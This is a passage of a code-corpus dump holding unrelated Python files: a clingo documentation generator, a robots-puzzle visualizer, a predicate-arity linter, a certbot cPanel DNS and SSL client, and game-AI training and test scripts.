array = [random.randint(args.min_value, args.max_value) for _ in range(args.array_length)]
# Sort array
expected_array = tuple(sorted(array))
array = tuple(combo_sorted(array, block_size=args.block_size))
if array != expected_array:
print(f'Expected: {repr(expected_array)}')
print(f'Actual: {repr(array)}')
print()
break
else:
print('All tests pass')
``` |
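A quick interactive check of the sort helpers above (a sketch, separate from the assignment's own randomized test in `__main__`):

```python
data = [5, 3, 8, 1, 9, 2]
print(list(combo_sorted(list(data), block_size=4)))       # [1, 2, 3, 5, 8, 9]
print(list(merge_sorted([1, 4, 9], [2, 3, 10])))          # [1, 2, 3, 4, 9, 10]
print(list(insertion_sorted([3, 1, 2], in_place=False)))  # [1, 2, 3]
```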
{
"source": "0x326/clingo",
"score": 2
} |
#### File: py/_gen/gen.py
```python
import os
import re
import pdoc
import clingo
import importlib.machinery
def _is_public(ident_name):
"""
Returns `True` if `ident_name` matches the export criteria for an
identifier name.
"""
return True
#pdoc._is_public = _is_public
clingo.ast.__spec__ = importlib.machinery.ModuleSpec("clingo.ast", None)
clingo.__pdoc__ = {}
pdoc.tpl_lookup.directories.insert(0, './templates')
ctx = pdoc.Context()
cmod = pdoc.Module(clingo, context=ctx)
amod = pdoc.Module(clingo.ast, supermodule=cmod, context=ctx)
cmod.doc["ast"] = amod
cmod.doc["__version__"] = pdoc.Variable("__version__", cmod, "__version__: str\n\nVersion of the clingo module (`'{}'`).".format(clingo.__version__))
cmod.doc["Infimum"] = pdoc.Variable("Infimum", cmod, '''Infimum: Symbol\n\nRepresents a symbol of type `clingo.SymbolType.Infimum`.''')
cmod.doc["Supremum"] = pdoc.Variable("Supremum", cmod, '''Supremum: Symbol\n\nRepresents a symbol of type `clingo.SymbolType.Supremum`.''')
pdoc.link_inheritance(ctx)
prefix = "../clingo/python-api/{}".format(".".join(clingo.__version__.split(".")[:2]))
cprefix = "../clingo/python-api/current"
os.makedirs("{}/ast".format(prefix), exist_ok=True)
os.makedirs("{}/ast".format(cprefix), exist_ok=True)
cmod_html = cmod.html(external_links=True)
amod_html = amod.html(external_links=True)
open("{}/index.html".format(prefix), "w").write(cmod_html)
open("{}/ast/index.html".format(prefix), "w").write(amod_html)
open("{}/index.html".format(cprefix), "w").write(cmod_html.replace("clingo/python-api/5.4", "clingo/python-api/current"))
open("{}/ast/index.html".format(cprefix), "w").write(amod_html.replace("clingo/python-api/5.4", "clingo/python-api/current"))
```
#### File: clingo/robots/visualize.py
```python
import clingo
try:
import Tkinter
except ImportError:
import tkinter as Tkinter
# {{{1 class Board
class Board:
def __init__(self):
self.size = 1
self.blocked = set()
self.barriers = set()
self.targets = set()
self.pos = dict()
self.robots = [{}]
self.moves = []
self.current_target = None
self.solution = None
ctl = clingo.Control()
ctl.load("board.lp")
ctl.ground([("base", [])])
ctl.solve(on_model=self.__on_model)
def __on_model(self, m):
for atom in m.symbols(atoms=True):
if atom.name == "barrier" and len(atom.arguments) == 4:
x, y, dx, dy = [n.number for n in atom.arguments]
self.blocked.add((x - 1 , y - 1 , dx, dy))
self.blocked.add((x - 1 + dx, y - 1 , -dx, dy))
self.blocked.add((x - 1 , y - 1 + dy, dx, -dy))
self.blocked.add((x - 1 + dx, y - 1 + dy, -dx, -dy))
if dy == 0:
self.barriers.add(('west', x if dx == 1 else x - 1, y - 1))
else:
self.barriers.add(('north', x - 1, y if dy == 1 else y - 1))
elif atom.name == "dim" and len(atom.arguments) == 1:
self.size = max(self.size, atom.arguments[0].number)
elif atom.name == "available_target" and len(atom.arguments) == 4:
c, s, x, y = [(n.number if n.type == clingo.SymbolType.Number else str(n)) for n in atom.arguments]
self.targets.add((c, s, x - 1, y - 1))
elif atom.name == "initial_pos" and len(atom.arguments) == 3:
c, x, y = [(n.number if n.type == clingo.SymbolType.Number else str(n)) for n in atom.arguments]
self.pos[c] = (x - 1, y - 1)
for d in range(0, self.size):
self.blocked.add((d , 0, 0, -1))
self.blocked.add((d , self.size - 1, 0, 1))
self.blocked.add((0 , d, -1, 0))
self.blocked.add((self.size - 1, d, 1, 0))
def move(self, robot, dx, dy):
x, y = self.pos[robot]
while (not (x, y, dx, dy) in self.blocked and
not (x + dx, y + dy) in self.pos.values()):
x += dx
y += dy
self.pos[robot] = (x, y)
if (self.solution is not None and
len(self.solution) > 0 and
self.solution[0][0] == robot and
self.solution[0][1] == dx and
self.solution[0][2] == dy):
self.solution.pop(0)
if len(self.solution) == 0:
self.solution = None
else:
self.solution = None
def won(self):
r, _, x, y = self.current_target
return self.pos[r] == (x, y)
# {{{1 class Solver
# NOTE: it would be a nice gimmick to make the search interruptible
class Solver:
def __init__(self, horizon=0):
self.__horizon = horizon
self.__prg = clingo.Control(['-t4'])
self.__future = None
self.__solution = None
self.__assign = []
self.__prg.load("board.lp")
self.__prg.load("robots.lp")
parts = [ ("base", [])
, ("check", [0])
, ("state", [0])
]
for t in range(1, self.__horizon+1):
parts.extend([ ("trans", [t])
, ("check", [t])
, ("state", [t])
])
self.__prg.ground(parts)
self.__prg.assign_external(clingo.Function("horizon", [self.__horizon]), True)
def __next(self):
assert(self.__horizon < 30)
self.__prg.assign_external(clingo.Function("horizon", [self.__horizon]), False)
self.__horizon += 1
self.__prg.ground([ ("trans", [self.__horizon])
, ("check", [self.__horizon])
, ("state", [self.__horizon])
])
self.__prg.assign_external(clingo.Function("horizon", [self.__horizon]), True)
def start(self, board):
self.__assign = []
for robot, (x, y) in board.pos.items():
self.__assign.append(clingo.Function("pos", [clingo.Function(robot), x+1, y+1, 0]))
self.__assign.append(clingo.Function("target",
[ clingo.Function(board.current_target[0])
, board.current_target[2] + 1
, board.current_target[3] + 1
]))
for x in self.__assign:
self.__prg.assign_external(x, True)
self.__solution = None
self.__future = self.__prg.solve(on_model=self.__on_model, async_=True)
def busy(self):
if self.__future is None:
return False
if self.__future.wait(0):
if self.__solution is None:
self.__next()
self.__future = self.__prg.solve(on_model=self.__on_model, async_=True)
return True
else:
self.__future = None
return False
return True
def stop(self):
if self.__future is not None:
self.__future.cancel()
self.__future.wait()
self.__future = None
self.get()
def get(self):
solution = self.__solution
self.__solution = None
for x in self.__assign:
self.__prg.assign_external(x, False)
self.__assign = []
return solution
def __on_model(self, m):
self.__solution = []
for atom in m.symbols(atoms=True):
if atom.name == "move" and len(atom.arguments) == 4:
c, x, y, t = [(n.number if n.type == clingo.SymbolType.Number else str(n)) for n in atom.arguments]
self.__solution.append((c, x, y, t))
self.__solution.sort(key=lambda x: x[3])
p = None
i = 0
for x in self.__solution:
if p is not None and \
p[0] == x[0] and \
p[1] == x[1] and \
p[2] == x[2]:
break
p = x
i += 1
del self.__solution[i:]
# {{{1 class Visualization
class Visualization:
def __init__(self, master, board):
self.__margin = 20
self.__tile_size = 40
self.__canvas_width = None
self.__canvas_height = None
self.__robot_images = {}
self.__target_images = {}
self.__solution_images = []
self.__direction_images = []
self.__entered = set()
self.__slots = {}
self.__highlights = {}
self.__targets = {}
self.__moves = {}
self.__moves_short = {}
self.__robots = {}
self.__barriers = {}
self.__tiles = []
self.__canvas_width = board.size * self.__tile_size + 2 * self.__margin
self.__canvas_height = (1 + board.size) * self.__tile_size + 3 * self.__margin
self.__canvas = Tkinter.Canvas(master, width=self.__canvas_width, height=self.__canvas_height)
self.__canvas.pack()
colors = ['green', 'red', 'blue', 'yellow']
shapes = ['moon', 'sun', 'star', 'saturn']
directions = [('north', 0, -1), ("east", 1, 0), ('south', 0, 1), ('west', -1, 0)]
for orientation in ['left', 'right']:
path = 'img/tile_{orientation}.gif'.format(orientation=orientation)
self.__tiles.append(Tkinter.PhotoImage(file=path))
for direction in ['north', 'west']:
path = 'img/wall_{direction}.gif'.format(direction=direction)
self.__barriers[direction] = (Tkinter.PhotoImage(file=path), -6, -6)
for color in colors:
path = 'img/robot_{color}.gif'.format(color=color)
self.__robots[color] = Tkinter.PhotoImage(file=path)
for shape in shapes:
path = "img/{shape}_{color}.gif".format(shape=shape, color=color)
self.__targets[(color, shape)] = Tkinter.PhotoImage(file=path)
for (direction, dx, dy) in directions:
path = "img/arrow_{color}_{direction}.gif".format(color=color, direction=direction)
self.__moves[(color, dx, dy)] = Tkinter.PhotoImage(file=path)
path = "img/move_{color}_{direction}.gif".format(color=color, direction=direction)
self.__moves_short[(color, dx, dy)] = Tkinter.PhotoImage(file=path)
for x in range(0, board.size):
for y in range(0, board.size):
self.__canvas.create_image(
self.__margin + self.__tile_size * x,
self.__margin + self.__tile_size * y,
anchor=Tkinter.NW,
image=self.__tiles[(x + y) % len(self.__tiles)])
for (t, m, x, y) in board.targets:
self.__target_images[(x, y)] = self.__canvas.create_image(
self.__margin + self.__tile_size * x,
self.__margin + self.__tile_size * y,
anchor=Tkinter.NW,
image=self.__targets[(t,m)])
self.__canvas.itemconfig(
self.__target_images[(x, y)],
state=Tkinter.HIDDEN)
for (r, (x, y)) in board.pos.items():
self.__robot_images[r] = self.__canvas.create_image(
self.__margin + self.__tile_size * x,
self.__margin + self.__tile_size * y,
anchor=Tkinter.NW,
image=self.__robots[r])
for (d, x, y) in board.barriers:
(img, dx, dy) = self.__barriers[d]
self.__canvas.create_image(
self.__margin + self.__tile_size * x + dx,
self.__margin + self.__tile_size * y + dy,
anchor=Tkinter.NW,
image=img)
self.__solve_button = self.__canvas.create_text(
board.size * self.__tile_size / 2 + self.__margin,
(0.5 + board.size) * self.__tile_size + 2 * self.__margin,
text="Solve!",
activefill="blue",
state=Tkinter.HIDDEN)
self.__solving_text = self.__canvas.create_text(
board.size * self.__tile_size / 2 + self.__margin,
(0.5 + board.size) * self.__tile_size + 2 * self.__margin,
text="Solving...",
state=Tkinter.HIDDEN)
self.__canvas.bind('<Motion>', self.__mouse_move_event)
self.__canvas.bind('<Button-1>', self.__mouse_click_event)
def __mouse_over(self, tag, mx, my):
if self.__canvas.itemcget(tag, "state") == Tkinter.HIDDEN:
return False
x, y, xx, yy = self.__canvas.bbox(tag)
return mx >= x and mx < xx and \
my >= y and my < yy
def __mouse_over_triangle(self, tag, mx, my, dx, dy):
if self.__mouse_over(tag, mx, my):
px, py = self.__canvas.coords(tag)
px = (mx - px) / self.__tile_size
py = (my - py) / self.__tile_size
rx = px - py
ry = px + py - 1
if (dx - dy) * rx < 0 and (dx + dy) * ry < 0:
return True
return False
def __mouse_click_event(self, e):
clicked = set()
for (x, y), t in self.__target_images.items():
if self.__mouse_over(t, e.x, e.y):
clicked.add(("target", (x, y)))
for (t, val) in self.__direction_images:
r, x, y, dx, dy = val
if self.__mouse_over_triangle(t, e.x, e.y, dx, dy):
clicked.add(("robot", val))
if self.__mouse_over(self.__solve_button, e.x, e.y):
clicked.add(("solve", None))
for tag, val in clicked:
for slot in self.__slots.get(tag, []):
slot("click", val)
def __mouse_move_event(self, e):
entered = set()
for ((x, y), t) in self.__target_images.items():
if self.__mouse_over(t, e.x, e.y):
entered.add(("target", (x, y)))
for (t, val) in self.__direction_images:
r, x, y, dx, dy = val
if self.__mouse_over_triangle(t, e.x, e.y, dx, dy):
entered.add(("robot", val))
for (tag, val) in self.__entered - entered:
for slot in self.__slots.get(tag, []):
slot("leave", val)
for (tag, val) in entered - self.__entered:
for slot in self.__slots.get(tag, []):
slot("enter", val)
self.__entered = entered
def highlight(self, x, y, active):
if active and not (x, y) in self.__highlights:
m = 8
xx = self.__margin + x * self.__tile_size + m
yy = self.__margin + y * self.__tile_size + m
self.__highlights[(x, y)] = self.__canvas.create_rectangle(
(xx, yy, xx + self.__tile_size - 2 * m, yy + self.__tile_size - 2 * m),
width=3,
outline="blue")
elif not active and (x, y) in self.__highlights:
self.__canvas.delete(self.__highlights[(x, y)])
del self.__highlights[(x, y)]
def highlight_direction(self, x, y, dx, dy, active):
if active and not (x, y, dx, dy) in self.__highlights:
m = 8
xx = self.__margin + x * self.__tile_size + m
yy = self.__margin + y * self.__tile_size + m
xxx = xx + self.__tile_size - 2 * m
yyy = yy + self.__tile_size - 2 * m
cx = xx + (xxx - xx) / 2
cy = yy + (yyy - yy) / 2
if dx == -1: xx, xxx = xxx, xx
if dy == -1: yy, yyy = yyy, yy
if dy == 0: xxx = xx
if dx == 0: yyy = yy
self.__highlights[(x, y, dx, dy)] = self.__canvas.create_polygon(
(xx, yy, xxx, yyy, cx, cy),
width=3,
outline="blue",
fill="")
elif not active and (x, y, dx, dy) in self.__highlights:
self.__canvas.delete(self.__highlights[(x, y, dx, dy)])
del self.__highlights[(x, y, dx, dy)]
def clear_highlights(self):
for p in self.__highlights.values():
self.__canvas.delete(p)
self.__highlights = {}
def connect_target_event(self, slot):
self.__slots.setdefault("target", []).append(slot)
def connect_robot_event(self, slot):
self.__slots.setdefault("robot", []).append(slot)
def connect_solve_event(self, slot):
self.__slots.setdefault("solve", []).append(slot)
def update_board(self, board):
self.clear_directions()
for (r, (x, y)) in board.pos.items():
ox, oy = self.__canvas.coords(self.__robot_images[r])
self.__canvas.move(
self.__robot_images[r],
self.__margin + self.__tile_size * x - ox,
self.__margin + self.__tile_size * y - oy)
for dx, dy in [(1,0), (0,1), (-1,0), (0,-1)]:
xx = x + dx
yy = y + dy
if not (x, y, dx, dy) in board.blocked and not (xx, yy) in board.pos.values():
self.__direction_images.append((
self.__canvas.create_image(
self.__margin + self.__tile_size * xx,
self.__margin + self.__tile_size * yy,
anchor=Tkinter.NW,
image=self.__moves_short[r, dx, dy]),
(r, x, y, dx, dy)))
for tag in self.__solution_images:
self.__canvas.delete(tag)
self.__solution_images = []
if board.solution is not None:
i = 0
for (r, x, y, _) in board.solution:
self.__solution_images.append(
self.__canvas.create_image(
self.__margin + i * self.__tile_size,
2 * self.__margin + self.__tile_size * board.size,
anchor=Tkinter.NW,
image=self.__moves[(r, x, y)]))
i += 1
def enable_solve(self, board, state):
self.__canvas.itemconfigure(self.__solve_button, state=Tkinter.NORMAL if state == "enabled" else Tkinter.HIDDEN)
self.__canvas.itemconfigure(self.__solving_text, state=Tkinter.NORMAL if state == "busy" else Tkinter.HIDDEN)
def update_target(self, board):
for (t, m, x, y) in board.targets:
self.__canvas.itemconfig(self.__target_images[(x, y)], state=Tkinter.NORMAL if board.current_target is None else Tkinter.HIDDEN)
if board.current_target is not None:
self.__canvas.itemconfig(self.__target_images[board.current_target[2], board.current_target[3]], state=Tkinter.NORMAL)
def clear_directions(self):
for (tag, _) in self.__direction_images:
self.__canvas.delete(tag)
self.__direction_images = []
# {{{1 Application
class Main:
def __init__(self):
self.__master = Tkinter.Tk()
self.__board = Board()
self.__solver = Solver()
self.__canvas = Visualization(self.__master, self.__board)
#self.__master.bind("<Left>", self.__canvas.on_previous) # would be nice to have these two bindings as an undo/redo stack
#self.__master.bind("<Right>", self.__canvas.on_next)
self.__master.bind("<Escape>", lambda x: self.__master.quit())
self.__canvas.update_target(self.__board)
self.__canvas.connect_target_event(self.target_event)
self.__canvas.connect_robot_event(self.robot_event)
self.__canvas.connect_solve_event(self.solve_event)
def target_event(self, event, pos):
x, y = pos
if self.__board.current_target is None:
if event == "enter":
self.__canvas.highlight(x, y, True)
elif event == "leave":
self.__canvas.highlight(x, y, False)
elif event == "click":
for t in self.__board.targets:
if t[2] == x and t[3] == y:
self.__board.current_target = t
self.__canvas.update_target(self.__board)
self.__update_board()
def __update_board(self):
self.__canvas.clear_highlights()
self.__canvas.update_board(self.__board)
won = self.__board.won()
if won:
self.__board.current_target = None
self.__canvas.clear_directions()
self.__canvas.update_target(self.__board)
self.__canvas.enable_solve(self.__board, "enabled" if not won and self.__board.solution is None else "disabled")
def robot_event(self, event, pos):
r, x, y, dx, dy = pos
if event == "enter":
self.__canvas.highlight_direction(x+dx, y+dy, dx, dy, True)
elif event == "leave":
self.__canvas.highlight_direction(x+dx, y+dy, dx, dy, False)
else:
self.__solver.stop()
self.__board.move(r, dx, dy)
self.__update_board()
def solve_event(self, event, ignore):
self.__solver.start(self.__board)
self.__canvas.enable_solve(self.__board, "busy")
self.__master.after(500, self.timer_event)
def timer_event(self):
if self.__solver.busy():
self.__master.after(500, self.timer_event)
else:
self.__board.solution = self.__solver.get()
self.__update_board()
def run(self):
Tkinter.mainloop()
# {{{1 main
app = Main()
app.run()
```
{
"source": "0x326/miami-university-cse-464-group-project",
"score": 3
} |
#### File: miami-university-cse-464-group-project/game-logic/lint_predicates.py
```python
import re
import sys
from pathlib import Path
from typing import *
from typing import TextIO
try:
import colorful
except ImportError:
def identity(string: str) -> str:
return string
class ColorfulDummy:
def __getattr__(self, item):
return identity
colorful = ColorfulDummy()
else:
colorful.use_style('solarized')
predicate_re = re.compile(r'([a-z]\S*)\((.+)\)')
predicate_annotation_re = re.compile(r'^%\s*([a-z]\S*)\((.+)\)\.')
predicate_argument_re = re.compile(r'(".*?[^\\]"|".*?\\"|\d+|\w+),?')
class Predicate(NamedTuple):
name: str
arguments: Sequence[str]
def match_predicate_annotation(string: str) -> Optional[Predicate]:
"""
Finds a single predicate annotation
:param string: The string to search
:return: The parsed annotation
"""
match = predicate_annotation_re.search(string)
if match:
name, arguments = match.groups()
arguments = predicate_argument_re.finditer(arguments)
arguments = (argument.group(1) for argument in arguments)
return Predicate(name=name, arguments=tuple(arguments))
else:
return None
def match_predicates(file: TextIO) -> Iterator[Tuple[int, Predicate]]:
"""
Finds predicates
:param file: The file to search
:return: The predicates and the line number on which they are found
"""
for line_number, line in enumerate(file, start=1):
for match in predicate_re.finditer(line):
name, arguments = match.groups()
arguments = predicate_argument_re.finditer(arguments)
arguments = (argument.group(1) for argument in arguments)
yield line_number, Predicate(name=name, arguments=tuple(arguments))
def print_message(message: str, file_name: str, line_number: int):
"""
Convenience function to prepend a file name and line number before printing
:param message: The message to print
:param file_name: The name of the file that generated this message
:param line_number: The line number that generated this message
"""
print(f'{colorful.violet(file_name)}:{colorful.blue(line_number)}: {message}')
if __name__ == '__main__':
import argparse
    parser = argparse.ArgumentParser(description='Check that predicate usages match their annotated arity in .lp files')
parser.add_argument('files', metavar='FILES', nargs='+', type=Path,
help='The .lp files to lint')
args = parser.parse_args()
# Since this program's purpose is to check predicate arity,
# assume there is only one predicate per identifier
predicate_signatures: Dict[str, Sequence[str]] = {}
# Scan for predicate annotations
for file_path in args.files:
with open(file_path) as file:
for line in file:
predicate = match_predicate_annotation(line)
if predicate:
predicate_signatures[predicate.name] = predicate.arguments
# Scan codebase for violations
violations_found = False
for file_path in args.files:
with open(file_path) as file:
for line_number, predicate in match_predicates(file):
actual_arity = len(predicate.arguments)
try:
expected_arity = len(predicate_signatures[predicate.name])
assert expected_arity == actual_arity
except KeyError:
# Missing annotation
predicate_signature = colorful.bold_yellow(f'{predicate.name}/{actual_arity}')
print_message(colorful.yellow(f'Missing annotation for {predicate_signature}'),
file_name=file_path, line_number=line_number)
violations_found = True
except AssertionError:
# Annotation violation
actual_signature = colorful.bold_red(f'{predicate.name}/{actual_arity}')
expected_signature = colorful.bold_red(f'{predicate.name}/{expected_arity}')
print_message(colorful.red(f'{actual_signature} should be {expected_signature}'),
file_name=file_path, line_number=line_number)
violations_found = True
if violations_found:
sys.exit(1)
```
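For orientation, a minimal usage sketch of the annotation parser above; importing it as a bare `lint_predicates` module is an assumption (the script is not packaged):
```python
# Hypothetical usage of the parsing helpers above; the import path is an assumption.
from lint_predicates import match_predicate_annotation

# A well-formed annotation comment has the shape `% name(arg1, arg2).`
predicate = match_predicate_annotation('% owns(Player, "Lightning Bolt").')
print(predicate.name)        # owns
print(predicate.arguments)   # ('Player', '"Lightning Bolt"')

# Lines without the leading `%` marker are not annotations and yield None.
assert match_predicate_annotation('owns(Player).') is None
```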
{
"source": "0x3333/certbot-cpanel",
"score": 3
} |
#### File: certbot-cpanel/certbot_cpanel/cpanel.py
```python
import logging
import base64
import json
try:
# python 3
from urllib.request import urlopen, Request
from urllib.parse import urlencode
except ImportError:
# python 2
from urllib import urlencode
from urllib2 import urlopen, Request
from certbot import errors
logger = logging.getLogger(__name__)
class CPanelClient:
"""Encapsulate communications with the cPanel API 2"""
def __init__(self, url, username, password, token):
self.request_url = "%s/json-api/cpanel" % url
self.data = {
'cpanel_jsonapi_user': username,
'cpanel_jsonapi_apiversion': '2',
}
if token:
self.headers = {
'Authorization': 'cpanel %s:%s' % (username, token)
}
else:
self.headers = {
'Authorization': 'Basic %s' % base64.b64encode(
("%s:%s" % (username, password)).encode()).decode('utf8')
}
def add_txt_record(self, record_name, record_content, record_ttl=60):
"""Add a TXT record
:param str record_name: the domain name to add
:param str record_content: the content of the TXT record to add
:param int record_ttl: the TTL of the record to add
"""
cpanel_zone, cpanel_name = self._get_zone_and_name(record_name)
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'ZoneEdit'
data['cpanel_jsonapi_func'] = 'add_zone_record'
data['domain'] = cpanel_zone
data['name'] = cpanel_name
data['type'] = 'TXT'
data['txtdata'] = record_content
data['ttl'] = record_ttl
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers,
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
if response_data['data'][0]['result']['status'] == 1:
logger.info("Successfully added TXT record for %s", record_name)
else:
raise errors.PluginError("Error adding TXT record: %s" % response_data['data'][0]['result']['statusmsg'])
def del_txt_record(self, record_name, record_content, record_ttl=60):
"""Remove a TXT record
:param str record_name: the domain name to remove
:param str record_content: the content of the TXT record to remove
:param int record_ttl: the TTL of the record to remove
"""
cpanel_zone, _ = self._get_zone_and_name(record_name)
record_lines = self._get_record_line(cpanel_zone, record_name, record_content, record_ttl)
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'ZoneEdit'
data['cpanel_jsonapi_func'] = 'remove_zone_record'
data['domain'] = cpanel_zone
# the lines get shifted when we remove one, so we reverse-sort to avoid that
record_lines.sort(reverse=True)
for record_line in record_lines:
data['line'] = record_line
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
if response_data['data'][0]['result']['status'] == 1:
logger.info("Successfully removed TXT record for %s", record_name)
else:
raise errors.PluginError("Error removing TXT record: %s" % response_data['data'][0]['result']['statusmsg'])
def install_crt(self, domain, cabundle, crt, key):
"""Install a certificate in a domain
:param str domain: the domain to use the certificate
:param str cabundle: the CA Bundle of the certificate
:param str crt: the domain's certificate
:param str key: the certificate's key
"""
# cpanel_zone, cpanel_name = self._get_zone_and_name(record_name)
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'SSL'
data['cpanel_jsonapi_func'] = 'installssl'
data['domain'] = domain
data['cabundle'] = cabundle
data['crt'] = crt
data['key'] = key
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers,
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
if response_data['data'][0]['result'] == 1:
logger.info("Successfully installed SSL certificate for %s", domain)
else:
raise errors.PluginError("Error installing SSL certificate: %s" % response_data['data'][0]['result']['output'])
def _get_zone_and_name(self, record_domain):
"""Find a suitable zone for a domain
        :param str record_domain: the domain name
:returns: (the zone, the name in the zone)
:rtype: tuple
"""
cpanel_zone = ''
cpanel_name = ''
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'ZoneEdit'
data['cpanel_jsonapi_func'] = 'fetchzones'
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
matching_zones = {zone for zone in response_data['data'][0]['zones'] if response_data['data'][0]['zones'][zone] and (record_domain == zone or record_domain.endswith('.' + zone))}
if matching_zones:
            cpanel_zone = max(matching_zones, key=len)
cpanel_name = record_domain[:-len(cpanel_zone)-1]
else:
raise errors.PluginError("Could not get the zone for %s. Is this name in a zone managed in cPanel?" % record_domain)
return (cpanel_zone, cpanel_name)
def _get_record_line(self, cpanel_zone, record_name, record_content, record_ttl):
"""Find the line numbers of a record a zone
:param str cpanel_zone: the zone of the record
:param str record_name: the name in the zone of the record
:param str record_content: the content of the record
:param str cpanel_ttl: the ttl of the record
:returns: the line number and all it's duplicates
:rtype: list
"""
record_lines = []
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'ZoneEdit'
data['cpanel_jsonapi_func'] = 'fetchzone_records'
data['domain'] = cpanel_zone
        data['name'] = record_name + ('.' if not record_name.endswith('.') else '')  # ensure a fully-qualified name with a trailing dot
data['type'] = 'TXT'
data['txtdata'] = record_content
data['ttl'] = record_ttl
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
record_lines = [int(d['line']) for d in response_data['data']]
return record_lines
```
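A minimal sketch of driving the client above; the host, user, and token are placeholders, and the certbot plugin normally supplies them from its configuration:
```python
# Hypothetical usage; every credential below is a placeholder.
from certbot_cpanel.cpanel import CPanelClient

client = CPanelClient(
    url="https://cpanel.example.com:2083",
    username="exampleuser",
    password=None,              # ignored when an API token is given
    token="EXAMPLETOKEN",
)

# Publish the ACME DNS-01 challenge record, then remove it after validation.
client.add_txt_record("_acme-challenge.example.com", "validation-token", record_ttl=60)
client.del_txt_record("_acme-challenge.example.com", "validation-token", record_ttl=60)
```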
{
"source": "0x384c0/alpha-zero-general",
"score": 3
} |
#### File: tk/test/testTKGame.py
```python
import unittest
import sys
sys.path.append('..')
from ..TKLogic import Board
from ..TKGame import TKGame as Game, display
from utils import *
class TestTKGame(unittest.TestCase):
def setUp(self):
self.game = Game()
self.board = Board()
self.display = display
def tearDown(self):
self.board = None
def testCanonicalForm(self):
board = self.board.execute_move(0, 1)
canonical_form_p1 = self.game.getCanonicalForm(board, 1)
valids_p1 = self.game.getValidMoves(canonical_form_p1,1)
self.assertEqual(valids_p1.tolist(), [1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])
canonical_form_p2 = self.game.getCanonicalForm(board, -1)
valids_p2 = self.game.getValidMoves(canonical_form_p2,1)
self.assertEqual(valids_p2.tolist(), [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1])
if __name__ == '__main__':
unittest.main()
```
#### File: 0x384c0/alpha-zero-general/train_with_heuristic.py
```python
import random
import copy
import numpy as np
from tk.TKPlayers import HeuristicPlayer
from tk.TKGame import TKGame as Game
from tk.TKGame import Board, WIN_SCORE
from tk.keras.NNet import NNetWrapper as nn
from tk.test.testTKLogick import generate_encoded_state, parse_encoded_state
from tk.keras.NNet import NNetWrapper as NNet
from keras.utils import Progbar
from utils import *
NUM_ITERS = number_of_train_iterations()
NUM_STEPS = 1000
INVALID_ACTION_REWARD = -1
def random_argmax(array):
MAX_DIFF = 2
arg_max = np.argmax(array)
max_value = array[arg_max]
    # Seed the pool with three copies of the argmax so it is favoured,
    # then add every valid index whose value is within MAX_DIFF of the maximum.
    max_value_ids = [arg_max, arg_max, arg_max]
for idx, value in enumerate(array):
if value != INVALID_ACTION_REWARD and max_value - value <= MAX_DIFF:
max_value_ids.append(idx)
return random.choice(max_value_ids)
def generate_train_batch(num_steps):
input_boards = []
target_pis = []
target_vs = []
board = Board()
game = Game()
heuristicPlayer = HeuristicPlayer()
player = 1
print("generate_train_batch")
progbar = Progbar(num_steps)
for x in range(num_steps):
progbar.add(1)
encoded_state = board.get_encoded_state()
canonical_form = game.getCanonicalForm(encoded_state, player)
best_action = heuristicPlayer.play(canonical_form)
game_ended = game.getGameEnded(encoded_state, player)
if game_ended == 0:
input_board = game.getCanonicalForm( copy.deepcopy(encoded_state), player)
encoded_state = board.execute_move(best_action, player)
score = board.get_players_scores()[player]
action_onehot = number_to_onehot(best_action,Board.action_size)
win_probability = float(score) / float(WIN_SCORE)
player *= -1
input_boards.append(input_board)
target_pis.append(action_onehot)
target_vs.append(win_probability)
# print("\n")
# print(parse_encoded_state(input_board))
# print("best_action " + str(best_action))
else:
            player = 1  # reset to the first player
board = Board() # no valid actions or game ended, reset board
encoded_state = board.get_encoded_state()
return input_boards, target_pis, target_vs
#test
# batch = generate_train_batch(NUM_STEPS)
# exit()
# training
g = Game()
n1 = NNet(g)
n1.load_checkpoint('temp',"best.pth.tar")
n1.nnet.model._make_predict_function()
for i in range(NUM_ITERS):
print("iteration " + str(i) + " / " + str(NUM_ITERS))
input_boards, target_pis, target_vs = generate_train_batch(NUM_STEPS)
input_boards = np.asarray(input_boards)
target_pis = np.asarray(target_pis)
target_vs = np.asarray(target_vs)
n1.nnet.model.fit(x = input_boards, y = [target_pis, target_vs], batch_size = int(NUM_STEPS * .6), epochs = 5)
if i % 5 == 0:
n1.save_checkpoint('temp',"best.pth.tar")
loss = n1.nnet.model.test_on_batch(x = input_boards, y = [target_pis, target_vs])
print(loss)
```
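To see the sampling bias of `random_argmax` in isolation, here is a small standalone sketch; the helper is copied from above and the values are made up:
```python
# Standalone copy of random_argmax from above, for illustration only.
import random

import numpy as np

INVALID_ACTION_REWARD = -1

def random_argmax(array):
    MAX_DIFF = 2
    arg_max = np.argmax(array)
    max_value = array[arg_max]
    max_value_ids = [arg_max, arg_max, arg_max]  # the argmax enters the pool three times
    for idx, value in enumerate(array):
        if value != INVALID_ACTION_REWARD and max_value - value <= MAX_DIFF:
            max_value_ids.append(idx)
    return random.choice(max_value_ids)

values = np.array([5, 4, -1, 1])                 # index 2 marks an invalid action
picks = [random_argmax(values) for _ in range(1000)]
# Index 0 dominates, index 1 appears occasionally (5 - 4 <= MAX_DIFF),
# indices 2 and 3 never appear (invalid, and 5 - 1 > MAX_DIFF).
```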
{
"source": "0x384c0/Experiments-RL",
"score": 3
} |
#### File: keras-rl/game_th/Env.py
```python
import gym
from gym import spaces
import numpy as np
from Game import Game,GameResult
from GameHistory import GameHistory
class Env():
def __init__(self,game):
self._game = game
self.action_space = spaces.Discrete(self._game.get_num_actions())
